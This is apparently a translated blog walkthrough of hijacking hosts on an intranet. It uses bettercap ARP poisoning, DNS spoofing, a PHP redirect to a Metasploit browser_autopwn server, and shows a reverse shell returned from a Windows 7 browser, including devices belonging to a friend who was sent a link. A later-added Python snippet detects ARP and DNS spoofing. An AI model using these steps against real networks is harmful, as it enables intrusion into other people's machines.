Intranet host webpage hijacking

Test host: kali 2016.2

Tools: bettercap, metasploit, dnsspoof, armitage

Initial preparation work

Bettercap is not integrated under kali, so we need to install it ourselves

The installation is complete

Start the postgresql service

Metasploit database initialization

Check the database connection status. If it shows that the database is not connected, refer to the linked portal on connecting to the database.

Start armitage (about armitage)

Prepare a hosts file (for DNS spoofing)

Update: I just tried it, and adding the port number to the hosts file seems to cause some unexpected problems. So we change approach: point the hosts entry straight at the IP address without a port number, start the apache service, and save the following code as index.php in the web root (/var/www/html/):

<?php header("Location:http://10.167.33.1:8080"); ?>

This way, after DNS spoofing the host lands on the specified IP, and the PHP then redirects it to our payload.

Another method is to set the port number of the browser auto-attack module below directly to 80 when starting it.

/************************************** Preparation complete **************************************/

Start the browser auto-attack module: browser_autopwn

Wait for it to load all the payloads

ARP attack (run: bettercap -X)

DNS spoofing (I forgot the screenshots and added them afterwards, so the parameters differ a bit)

Now we wait for a fish to bite. From here on, any host behind the same gateway will resolve every URL it opens to our address, and when it opens our URL the module automatically checks which payload works against it.

Our DNS spoofing only affects hosts behind the same gateway, but the URL we hand out still leads only to our address. In the picture below you can see two win10 hosts spoofed by ARP+DNS; the Android and win7 hosts belong to a friend I sent the URL to, who of course is also on the intranet. If you need to reach a host on the public network, see how a shell from the public network returns to Kali on the internal network. Finally, one win7 browser ran our payload and returned a shell.
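From the defender's side, the two effects just described leave visible traces: one IP address answering with more than one MAC, and many unrelated names all resolving to a single address. The following is an added example that is not code from the original post; the ARP and DNS records are constructed, and the gateway address, the MACs and the name threshold are assumptions.

```python
"""Added defensive example (not from the original post): flag the two
symptoms of ARP and DNS spoofing in constructed sample records."""
from collections import defaultdict

# Constructed sample ARP replies seen on the LAN: (sender_ip, sender_mac).
# The gateway IP and all MAC addresses are made up for this example.
ARP_REPLIES = [
    ("10.167.33.254", "aa:bb:cc:00:00:01"),   # real gateway
    ("10.167.33.254", "de:ad:be:ef:00:02"),   # same IP, second MAC: conflict
    ("10.167.33.20", "aa:bb:cc:00:00:20"),
]

# Constructed sample DNS answers: (queried_name, answer_ip).
# 10.167.33.1 is the address the walkthrough redirects victims to.
DNS_ANSWERS = [
    ("www.example.com", "10.167.33.1"),
    ("mail.example.org", "10.167.33.1"),
    ("update.example.net", "10.167.33.1"),
    ("intranet.corp.local", "10.167.33.50"),
]


def arp_conflicts(replies):
    """Return {ip: sorted MACs} for every IP claimed by more than one MAC."""
    seen = defaultdict(set)
    for ip, mac in replies:
        seen[ip].add(mac.lower())
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}


def dns_sinkholes(answers, min_names=3):
    """Return {ip: sorted names} for answer IPs shared by at least
    min_names distinct queried names (assumed threshold)."""
    by_ip = defaultdict(set)
    for name, ip in answers:
        by_ip[ip].add(name.lower())
    return {ip: sorted(names) for ip, names in by_ip.items()
            if len(names) >= min_names}


if __name__ == "__main__":
    for ip, macs in arp_conflicts(ARP_REPLIES).items():
        print(f"ARP: {ip} claimed by {macs} -> possible poisoning")
    for ip, names in dns_sinkholes(DNS_ANSWERS).items():
        print(f"DNS: {len(names)} unrelated names resolve to {ip} -> possible spoofing")
```

Fed with real ARP captures and resolver logs instead of the constructed lists, the same two checks give an early warning of the attack shown above.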

Check the file

Screenshots

Of course, the functionality goes far beyond this; there is more to explore on your own.

Origin blog.csdn.net/THMAIL/article/details/107736662